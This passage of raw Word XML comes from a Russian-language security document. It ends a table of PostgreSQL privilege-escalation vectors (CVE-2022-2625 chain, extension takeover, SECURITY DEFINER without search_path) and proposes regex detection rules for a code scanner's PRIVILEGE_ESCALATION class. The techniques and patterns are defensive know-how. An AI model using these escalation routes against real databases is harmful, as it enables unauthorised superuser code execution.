              <w:t>CREATE на БД (PG 13+)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B9863A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RCE без superuser</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5F3D41" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.2b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0FB0F7C3"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673E7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.5 chain 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D48BEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2022-2625 (chain)</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084F52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.8 (High)</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D7E949" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>≤ 14.4/13.7/12.11/11.16/10.21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1D6FF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>14.5/13.8/12.12/11.17/10.22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5CED10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CREATE на БД (PG 13+)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FF373D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Extension-function takeover</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F6CA05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1A876CFD"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1DB46E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.13.6</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9FA976" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>— (mis-configuration)</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351B57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>n/a</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669BAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>все версии PG</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6EB866" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>n/a (не CVE)</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5139F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>EXECUTE на SECURITY DEFINER функцию</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EE8A30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>RCE как owner функции (superuser)</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381B99" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.1 / 3.7.2a / 3.7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="586CE66D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>После фикс-версий всех CVE остаётся только 3.13.6 как актуальная угроза.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D0BD23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>rules.py — готовое правило для класса PRIVILEGE_ESCALATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F4C3E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сводный набор паттернов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670B523F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/schemas/sql.py — добавить в VulnerabilityClass enum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F2DFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class VulnerabilityClass(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3673A9A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E408A12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    PRIVILEGE_ESCALATION = "privilege_escalation"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFD8790" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054693E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/services/judge/rules.py — добавить в DEFAULT_RISK_BY_CLASS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA4D0AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VulnerabilityClass.PRIVILEGE_ESCALATION: 9,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E62276" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4E9E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/services/judge/rules.py — добавить в _RE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684DFF15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"privesc_set_role_app": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133FC35D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # SET ROLE в application-коде с конкатенацией (signal для 3.13.1 + 3.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10368E7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:execute|fetch)\s*\(\s*[\"']SET\s+ROLE\s+[^\"']*\{",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18054B19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1EB0F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A778DA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"privesc_schema_element": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77823A06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # CREATE SCHEMA с schema_element, ссылающимся на user-defined функцию (3.13.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F8E9C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"CREATE\s+SCHEMA\s+\w+\s+CREATE\s+(TABLE|VIEW)\b[^;]*DEFAULT\s+\w+\.\w+\s*\(",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2D127E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE | re.DOTALL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B4325" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BB8DF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"privesc_function_index": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214277C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # function-based index с функцией из чужой schema (3.13.3 — требует runtime owner-check)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF8E8FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"CREATE\s+INDEX[^;]*\(\(\s*\w+\.\w+\s*\(",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210E8BB3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46121371" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E809F7B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"privesc_extension_create_app": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67730BD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # CREATE EXTENSION от application-роли (signal для 3.13.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439964D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    r"(?:execute|fetch)\s*\(\s*[\"']CREATE\s+EXTENSION\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBE2EA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11106608" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D26FE93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"privesc_secdef_no_searchpath": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0113B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # SECURITY DEFINER без SET search_path в declaration (3.13.6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D08F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # требует multi-line matching на body CREATE FUNCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D2D17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"CREATE\s+(OR\s+REPLACE\s+)?FUNCTION\b[^;]*SECURITY\s+DEFINER\b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C27AAE4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?![^;]*SET\s+search_path)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D3B703" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE | re.DOTALL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D209AD3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E054FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"privesc_pg_catalog_function": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07293A91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # pre-create функции в pg_catalog (R16-indicator, 3.13.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B8792F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"CREATE\s+(OR\s+REPLACE\s+)?FUNCTION\s+pg_catalog\.\w+",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670DD5DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D27EAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E521181" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
